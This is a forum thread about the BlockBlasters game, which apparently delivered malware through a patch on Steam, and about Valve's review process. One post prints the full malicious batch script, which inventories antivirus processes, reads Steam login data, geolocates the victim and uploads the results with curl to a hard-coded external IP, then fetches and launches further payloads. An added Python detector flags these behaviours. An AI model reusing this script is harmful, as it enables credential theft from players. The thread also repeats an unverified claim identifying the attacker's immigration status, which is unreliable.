
Crypto Theft "Game" allowed onto Steam


Post by Roguey »

Valve let some schmuck put a crypto drainer (Block Blasters) on their store.



Previously we made a post about a cancer patient being a victim of a malicious Steam game. It is a cryptodrainer masquerading as a free-to-play video game.

Based on reports and conversations occurring online, this is the malicious video game:

I'm not a video game developer, but this file looks strange. Why does this video game contain a .bat file that looks for your browser credentials and crypto wallets?

dawg, OSINT nerds found the guy who drained the cancer bro. hes an immigrant on a VISA from argentina currently living in miami, florida, USA

the OSINT nerds reported him to ICE

Seems really bad that they could just let this happen, no safeguards against it?


Post by rusty_shackleford »

Roguey wrote: September 22nd, 2025, 12:14
Seems really bad that they could just let this happen, no safeguards against it?
Do you have any idea how much effort it would be to actually test every game/game update at this point? It's one of the most obvious weaknesses of just allowing anything on your platform (along with massive content dilution)
Thank you for your attention to this matter!
Steam friend code: 40552640 https://steamcommunity.com/friends/add | email: [email protected]
Having trouble running an old Windows game?
Rusty's Stuff Collection
Post by rusty_shackleford »

Valve allowed this malware to exist for just under a month.
lmao
valve is so ******

wasn't even hidden, just a batch script,

Code:

@echo off
setlocal enabledelayedexpansion
title Top 
for /f "delims=" %%i in ('whoami') do set "COMPUTER_NAME=%%i"

set "randNum6=%RANDOM%%RANDOM%"
set "randNum6=%randNum6:~0,8%"


openfiles >nul 2>&1
if %errorlevel% == 0 (
    echo admin.
    start "" "%~dp0launch1.vbs"
    echo wav: admin: steam.exe %COMPUTER_NAME% > %TEMP%\game112.txt && curl -F "file=@%TEMP%\game112.txt;filename=%COMPUTER_NAME%%randNum6%_status.txt" http://203.188.171.156:30815/upload

    TIMEOUT 6
    exit

) else (
    echo .
)



:start

del %temp%\us_report.txt
del %temp%\match_line.txt
del %temp%\av_report.txt



for /f "delims=" %%a in ('curl -s ipinfo.io/city') do set "CITY=%%a"
for /f "delims=" %%a in ('curl -s ipinfo.io/region') do set "REGION=%%a"
for /f "delims=" %%a in ('curl -s ipinfo.io/country') do set "COUNTRY=%%a"

set "LOCATION=%CITY%, %REGION%, %COUNTRY%"

for /f "delims=" %%a in ('curl -s ip.me') do set "MYIP=%%a"




set "TEMP_FILE=%temp%\av_report.txt"


start "" "%~dp0Win64\VS2015\Party2\Party\Third\MegaAction\Engine\Binaries\ThirdParty\Ogg\Win64\VS2015\12321\Solution\A\New\test.vbs" 
TIMEOUT 2

set "randNum=%RANDOM%%RANDOM%"
set "randNum=%randNum:~0,8%"
echo %randNum%

echo Scanning for running antivirus processes...
echo UserID: %randNum% > "%TEMP_FILE%"
echo. >> "%TEMP_FILE%"
echo Antivirus Report from: %COMPUTER_NAME% >> "%TEMP_FILE%"




set AV_PROCESSES=acronisagent.exe aliedefense.exe almon.exe alyac.exe amitiav.exe arcabitav.exe arcticagent.exe ^
ashavast.exe ashmaisv.exe ashserv.exe aswidsagenta.exe avastmobilesecurity.exe avastsvc.exe avastui.exe avengine.exe ^
avgnt.exe avgui.exe avira.exe avp.exe baidu.exe bdagent.exe bkav.exe bytefence.exe ccsvchst.exe cis.exe ^
clamav.exe clamtray.exe clamwin.exe cmcav.exe cmdagent.exe crowdstrike.exe csagent.exe ctxsvc.exe cynetservice.exe ^
deepinstinct.exe defendercontrol.exe drweb32.exe drwebupw.exe egui.exe eguiproxy.exe emsisoft.exe endpoint.exe ^
esets_gui.exe escan.exe falxagent.exe fortitray.exe fsav32.exe f-scan.exe f-secure.exe fsgk32.exe fsdfwd.exe ^
fssm32.exe gddtray.exe gridinsoft.exe hipsservice.exe hitmanpro.exe huorong.exe ikarus.exe integoav.exe jiangmin.exe ^
k7av.exe kav.exe kavsvc.exe kavtray.exe kaspersky.exe kesgui.exe kingsoftav.exe lionic.exe malwarebytes.exe ^
maxsecureav.exe mbam.exe mbamservice.exe mbamtray.exe mcagent.exe mcshield.exe mcsysmon.exe mctray.exe mcvsshld.exe ^
mfemms.exe mfevtps.exe msascui.exe msmpeng.exe msseces.exe nanoscan.exe nav.exe navapsvc.exe navapw32.exe ^
nortonsecurity.exe npfmessenger.exe npfmsg2.exe outpost.exe panagent.exe panda_cloud_antivirus.exe ^
panda_url_filtering.exe psafe.exe psanhost.exe psuaservice.exe qhactivedefense.exe qhtray.exe qhws.exe rising.exe ^
rtlreminder.exe sangfor.exe sbamsvc.exe secureageav.exe secureaplus.exe sentinelagent.exe skyhigh.exe smc.exe ^
smcgui.exe sophosfs.exe sophoshealth.exe sophosui.exe spiderml.exe spidernt.exe spiderui.exe spyshelter.exe ^
ssmgr.exe superantispyware.exe symantec.exe tachyon.exe tehrisagent.exe tencentdlp.exe threatdownagent.exe ^
tmbmserver.exe tmbmsrv.exe tmlisten.exe tmntsrv.exe tmproxy.exe tmproxy.exe trapmineagent.exe trellixagent.exe ^
ufseagnt.exe varist.exe v3lite.exe v3main.exe v3sp.exe vb32av.exe vipre.exe virit.exe virobot.exe ^
vrfsvc.exe vrpsvc.exe vrpt.exe vsmon.exe vsserv.exe webroot.exe webrootsecureanywhere.exe winpatrol.exe ^
winssnotify.exe withsecure.exe wscntfy.exe wzservice.exe xcitium.exe xcommsvr.exe xvirus.exe yandexav.exe ^
zatray.exe zemana.exe zillya.exe zlclient.exe zonerav.exe zxguard.exe zxtray.exe


set FOUND=0

:: Dump all running processes once
tasklist /fo csv /nh | findstr /i ".exe" > "%temp%\running_tasks.txt"

for %%P in (%AV_PROCESSES%) do (
    findstr /I /C:"%%P" "%temp%\running_tasks.txt" >nul
    if !errorlevel! == 0 (
        echo Detected running AV process: %%P
        echo - %%P >> "%TEMP_FILE%"
        set /a FOUND+=1
    )
)

if "%FOUND%"=="0" (
    echo No known antivirus processes found. >> "%TEMP_FILE%"
)


set "OUTPUT_FILE=%temp%\us_report.txt"
set "VDF_FILE=C:\Program Files (x86)\Steam\config\loginusers.vdf"



if not exist "%VDF_FILE%" (

for /f "tokens=2,*" %%A in ('reg query "HKCU\Software\Valve\Steam" /v SteamPath 2^>nul ^| find "SteamPath"') do (
    set "VDF_FILE=%%B\config\loginusers.vdf"
    set "VDF_FILE=!VDF_FILE:/=\!"
    )
)

echo %VDF_FILE%


if not exist "%VDF_FILE%" (
    >> "%OUTPUT_FILE%" echo [ERROR] File not found: "%VDF_FILE%"
    goto tele
)

>> "%OUTPUT_FILE%" echo  
>> "%OUTPUT_FILE%" echo Steam Report

set "prev1="
set "prev2="
for /f "usebackq delims=" %%A in ("%VDF_FILE%") do (
    set "line=%%A"
    set "line=!line:	=!"  :: Remove tabs



    echo !line! | findstr /c:"\"AccountName\"" >nul
    if !errorlevel! neq 1 (
        set "SteamID=!prev2!"
        set "SteamID=!SteamID:"=!"
        set "AccountName=!line:*\"AccountName\"=\"=!"
        set "AccountName=!AccountName:"=!"
    )

    echo !line! | findstr /c:"\"PersonaName\"" >nul
    if !errorlevel! neq 1 (
        set "PersonaName=!line:*\"PersonaName\"=\"=!"
        set "PersonaName=!PersonaName:"=!"
    )

    echo !line! | findstr /c:"\"RememberPassword\"" >nul
    if !errorlevel! neq 1 (
        set "RememberPassword=!line:*\"RememberPassword\"=\"=!"
        set "RememberPassword=!RememberPassword:"=!"

        if defined SteamID if defined AccountName (
            >> "%OUTPUT_FILE%" echo [user: !AccountName! ^| display: !PersonaName! ^| ID: !SteamID! ^| remember: !RememberPassword!]
            set "SteamID=" & set "AccountName=" & set "PersonaName="
        )
    )
    set "prev2=!prev1!"
    set "prev1=!line!"
)

:tele

echo.
echo Sending report...


if exist "%temp%\us_report.txt" (
    goto das
) else (
    goto send
)


:das
set "file2=%temp%\us_report.txt"

> "%file2%.tmp" (
  for /f "usebackq delims=" %%A in ("%file2%") do (
    set "line=%%A"
    set "line=!line:PersonaName=!"
    set "line=!line:AccountName=!"
    set "line=!line:RememberPassword=!"
    echo(!line!
  )
)

move /y "%file2%.tmp" "%file2%" >nul

:: ================ View Live Players ===================

curl http://203.188.171.156:30815/whitelisted_users.txt -o output.txt

if not exist "%temp%\us_report.txt" (
    echo ERROR: "%temp%\us_report.txt" not found.
)

set "playerfound=0"
set "auto=0"

for /f "usebackq delims=" %%A in ("output.txt") do (
    set "search=%%A"
    findstr /i /c:"!search!" "%temp%\us_report.txt" >nul
    if !errorlevel! equ 0 (
        echo Player found: "!search!"
        set "playerfound=1"
        >>"%temp%\match_line.txt" echo  
        >>"%temp%\match_line.txt" echo Launched, Player found: !search!
    )
)

if "%playerfound%"=="0" (
    >>"%temp%\match_line.txt" echo  
    >>"%temp%\match_line.txt" echo Player not found
)

curl http://203.188.171.156:30815/settings.txt -o output2.txt


for /f "usebackq delims=" %%A in ("output2.txt") do (
    findstr /c:"1" "output2.txt" >nul
    if !errorlevel! equ 0 (
        set "auto=1"
        >>"%temp%\match_line.txt" echo  
        >>"%temp%\match_line.txt" echo auto=enabled
    )
)

>> "%OUTPUT_FILE%" echo  
>> "%OUTPUT_FILE%" echo %MYIP%
>> "%OUTPUT_FILE%" echo %LOCATION%

copy /b "%TEMP_FILE%" + "%OUTPUT_FILE%" + "%temp%\match_line.txt" + "%TEMP%\ext_found_list.txt" "%TEMP%\combined_msg.txt" >nul
:send


curl -F "file=@%TEMP%\combined_msg.txt;filename=%randNum%.txt" http://203.188.171.156:30815/upload




if %errorlevel%==0 (
    echo Report sent
) else (
    echo Failed
)


if "%playerfound%"=="1" (
    goto star3t
)



if "%auto%"=="1" (
    goto star3t
)



for /l %%i in (1,1,17) do (
    echo This is loop iteration %%i
    
    timeout /t 1 >nul
    curl http://203.188.171.156:30815/button_presses/%randNum%.txt -o output1.txt

    for /f "usebackq delims=" %%A in ("output1.txt") do (
    set "search=%%A"
    findstr /i "yes" output1.txt >nul
    if !errorlevel! equ 0 (
        echo Yes Found
        goto star3t
        )
    findstr /i "noaaa" output1.txt >nul
    if !errorlevel! equ 0 (
        echo No Found
        goto end
        )
    )
)


:end

if exist "Win64\VS2015\Party2\Party\Third\MegaAction\MegaActionPlatformer.exe" (
    start "" "Win64\VS2015\Party2\Party\Third\MegaAction\MegaActionPlatformer.exe"
)

::del "%TEMP_FILE%" >nul 2>&1
del %temp%\us_report.txt
del %temp%\match_line.txt
del %temp%\av_report.txt
timeout /t 1 >nul

exit


:star3t


if not exist "%temp%\running_tasks.txt" (
    tasklist /fo csv /nh | findstr /i ".exe" > "%temp%\running_tasks.txt"
)



:: ================ Check if ONLY msmpeng.exe is running ===================
set "ONLY_MSMPENG=0"
set "MSMPENG_FOUND=0"
set "TOTAL_FOUND=0"

for %%P in (%AV_PROCESSES%) do (
    findstr /I /C:"%%P" "%temp%\running_tasks.txt" >nul
    if !errorlevel! neq 1 (
        if /I "%%P"=="msmpeng.exe" (
            set "MSMPENG_FOUND=1"
        ) else (
            set /a TOTAL_FOUND+=1
        )
    )
)

:: Cleanup
::del "%TEMP_FILE%" >nul 2>&1
del %temp%\us_report.txt
del %temp%\match_line.txt
del %temp%\av_report.txt



set SEVENZIP=%~dp07-Zip\7z.exe
set PASSWORD="121"
set DEST_DIR=%~dp0
set DEST_DIR1=%~dp0bbb



set ZIP_FILE1=%~dp0v1.zip

if "!MSMPENG_FOUND!"=="1" if "!TOTAL_FOUND!"=="0" (
    
    echo.
    
    "!SEVENZIP!" x "!ZIP_FILE1!" -o"!DEST_DIR!" -p"!PASSWORD!" -y
    start "" "%~dp0launch1.vbs"
    TIMEOUT 1
    exit
)


set ZIP_FILE=%~dp0v2.zip

"%SEVENZIP%" x "%ZIP_FILE%" -o"%DEST_DIR1%" -p%PASSWORD% -y
if exist "%DEST_DIR1%\Block1.exe" (
    start "" "%DEST_DIR1%\Block1.exe"
)

if exist "Win64\VS2015\Party2\Party\Third\MegaAction\MegaActionPlatformer.exe" (
    start "" "Win64\VS2015\Party2\Party\Third\MegaAction\MegaActionPlatformer.exe"
)

echo.
TIMEOUT 1
exit

something that could have easily been caught just by checking all the files with AI:
Selection_011.webp
Selection_012.webp
Last edited by rusty_shackleford on September 22nd, 2025, 12:35, edited 1 time in total.
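A static triage pass of the kind the post above argues for, as an added example that is not part of the thread and not Valve's or G DATA's tooling: it scores a script for behaviours visible in the quoted batch file (multipart upload to a bare IP, reading loginusers.vdf, AV process inventory, password-protected archive extraction, .vbs launch) and reports the matching lines. Rule names, weights, the threshold and both sample scripts are constructed assumptions.

```python
import re

# Heuristics for behaviours visible in the batch script quoted above.
# Rule names, weights and the threshold are illustrative assumptions.
IP_URL = r'https?://\d{1,3}(?:\.\d{1,3}){3}'
RULES = [
    # -F (multipart form upload) is matched case-sensitively; -f means --fail.
    ("upload_to_bare_ip", 5, [r'curl\b.*\s(?-i:-F)\s.*' + IP_URL]),
    ("download_from_bare_ip", 3, [r'curl\b.*' + IP_URL + r'\S*\s+-o\s']),
    ("reads_steam_login_file", 4, [r'loginusers\.vdf']),
    ("av_process_inventory", 3, [r'\btasklist\b', r'\b(?:msmpeng|avp|mbam)\.exe\b']),
    ("external_ip_geolocation", 2, [r'\b(?:ipinfo\.io|ip\.me)\b']),
    ("password_archive_extract", 4, [r'\bx\s+"[^"\n]+".*\s-p\S']),
    ("launches_vbs", 2, [r'start\s+""\s+"[^"\n]*\.vbs"']),
]

def triage(text, threshold=8):
    """Score one script; a rule fires only if all of its patterns match."""
    hits, score = {}, 0
    for name, weight, patterns in RULES:
        found = [re.search(p, text, re.IGNORECASE) for p in patterns]
        if all(found):
            # Record the 1-based line of each pattern's first match.
            hits[name] = [text.count("\n", 0, m.start()) + 1 for m in found]
            score += weight
    return {"score": score, "review": score >= threshold, "hits": hits}

# Constructed samples (not from the page); 192.0.2.10 is a documentation address.
SUSPICIOUS = r'''@echo off
for /f "delims=" %%a in ('curl -s ipinfo.io/country') do set "COUNTRY=%%a"
tasklist /fo csv /nh > "%temp%\t.txt"
findstr /I /C:"msmpeng.exe" "%temp%\t.txt"
set "VDF_FILE=C:\Program Files (x86)\Steam\config\loginusers.vdf"
curl -F "file=@%TEMP%\r.txt" http://192.0.2.10:8080/upload
"%SEVENZIP%" x "%ZIP_FILE%" -o"%DEST%" -p%PASSWORD% -y
start "" "%~dp0launch1.vbs"
'''
BENIGN = r'''@echo off
cd /d "%~dp0"
start "" "Game.exe" -windowed
curl -s https://example.com/version.txt -o version.txt
'''

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, triage(sample))
```

A score at or above the threshold only queues the file for manual review; the per-rule line numbers tell the reviewer where to look first.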
Post by Roguey »

This site goes into more detail, apparently it started as a legitimate game and then malware was patched in after a month https://www.gdatasoftware.com/blog/2025 ... ds-malware

BlockBlasters is a 2D platformer/shooter game developed by Genesis Interactive. The game was released on July 31, 2025, which garnered hundreds of positive reviews. But on August 30, 2025, this month-old game released a patch (Build 19799326) that contains files exhibiting multiple malicious behaviors, which were flagged by G DATA MXDR.

In 2025, there has been a rise in malware infections in games being released on the popular games platform Steam. The perhaps most notable case is that of PirateFi[A], a Free-to-Play game that comes with an information stealing malware. The most recent malware infection in a game was Chemia(b), an early access title on Steam, which was compromised by a threat actor known as EncryptHub through the injection of malicious binaries. These threat actors bypassed initial security screening from Valve which allowed the deployment of malicious patches and infected multiple users of the platform. Now we observed a similar case in another Steam-released game called BlockBlasters, further highlighting the ongoing risks to players.

Apparently they reported it a week ago but Valve just sat on the report until they got brigaded yesterday


The cryptodrainer, which masqueraded as a legitimate video game on Steam, was identified by @GDATA over a week ago. It was reported to Steam. However, no action was taken.

Unless Valve changes, this might be it for indie devs on Steam, why take a chance on a random dev you don't know you can trust?

Last edited by Roguey on September 22nd, 2025, 12:35, edited 1 time in total.
Post by rusty_shackleford »

Roguey wrote: September 22nd, 2025, 12:34
This site goes into more detail, apparently it started as a legitimate game and then malware was patched in after a month https://www.gdatasoftware.com/blog/2025 ... ds-malware
27 days ago
https://steamdb.info/depot/3872351/hist ... 5224309749
Post by rusty_shackleford »

Roguey wrote: September 22nd, 2025, 12:34
Unless Valve changes, this might be it for indie devs on Steam, why take a chance on a random dev you don't know you can trust?
very strong suspicion that this will prompt Valve to require indie devs to give Valve source access + perform verifiable builds on Valve's servers
nearly all of this can be eliminated with AI (and manual review of flagged submissions), but it actually needs access to the source code

don't be surprised if they just shut submissions down for a week or two tho